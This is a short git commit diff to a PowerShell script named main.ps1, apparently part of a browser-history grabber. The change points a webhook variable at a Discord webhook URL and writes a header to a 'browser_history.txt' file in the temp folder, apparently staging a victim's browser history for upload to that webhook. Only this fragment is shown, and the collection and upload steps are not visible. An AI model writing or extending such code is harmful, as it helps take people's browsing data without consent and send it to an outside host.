Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:39:03 +00:00
committed by GitHub
parent 6f6e3d0231
commit a488914e0b

View File

@@ -1,5 +1,5 @@
$whuri = "$dc"
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
$outpath = "$env:temp\browser_history.txt"
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII